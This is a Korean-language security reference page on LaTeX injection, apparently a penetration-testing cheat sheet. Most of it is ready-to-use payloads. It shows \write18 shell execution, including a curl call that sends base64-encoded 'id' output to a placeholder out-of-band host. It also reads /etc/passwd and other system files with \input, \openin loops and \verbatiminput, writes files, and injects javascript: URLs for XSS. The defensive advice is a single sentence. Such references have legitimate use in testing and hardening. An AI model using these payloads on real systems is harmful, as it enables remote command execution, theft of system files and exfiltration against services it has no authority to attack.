Introduction
LaTex는 TeX 문법을 사용하는 typesetting system 으로 이를 처리하는 시스템에서 TeX 문법을 주입하여 공격자가 원하는 액션을 처리하도록 유도하는 것으로 LaTex Injection이라고 합니다.
TeX는 수학의 수식 등 특수한 형태를 띄는 글자를 쉽게 입력하고 사용하기 위한 문법으로 컴퓨터로 문서 작성을 위해 많이 사용되고 있습니다. 자세한 내용은 wikipedia의 TeX 문법 페이지를 보면 대략 어떤 내용인지 이해가 가능합니다.
Example
\frac{\pi}{2} = \int_{-1}^{1} \sqrt{1-x^2}\ dx
Offensive techniques
Detect
일반적으로 파일 변환 관련 기능에 존재할 가능성이 높습니다. 만약 LaTex를 처리할 수 있는 백엔드 로직이 있거나 의심가는 경우 LaTex 문법 위주로 Requset에 포함하여 반응을 살펴야합니다.
이 때 LaTex Injection 중 RCE 케이스는 OAST를 이용하면 판단할 수 있습니다.
\immediate/write18{curl http://<OAST> -X POST -d a=$(id|base64)}
Exploitation
Read file
\input 이나 \include 로 파을 읽을 수 있습니다.
\input{/etc/passwd}
\include{/etc/passwd}
Read single lined file
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
Read multiple lined file
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
usepackage로 다른 패키지를 로드하고, 해당 기능을 통해 읽을 수도 있습니다.
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
Injection 된 부분이 document header를 지난 경우에는 아래와 같은 방법을 사용할 수 있습니다.
\catcode `\$=12
\catcode `\#=12
\catcode `\_=12
\catcode `\&=12
\input{path_to_script.pl}
Write file
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\write\outfile{Line 2}
\write\outfile{I like trains}
\closeout\outfile
XSS
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
Command execution
\immediate\write18{ifconfig > output}
\input{output}
Defensive techniques
가급적 사용자 입력이 LaTex에 영향을 주지 않도록 서비스를 구성해야하며, 사용자 입력을 사용해야하는 경우 특수문자에 대한 검증이 필요합니다.
Tools
- none
References
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
- https://tex.stackexchange.com/questions/262625/security-latex-injection-hack
- https://en.wikibooks.org/wiki/LaTeX
- https://en.wikipedia.org/wiki/Help:Displaying_a_formula#LaTeX_basics
- https://github.com/joeraut/latex2image-web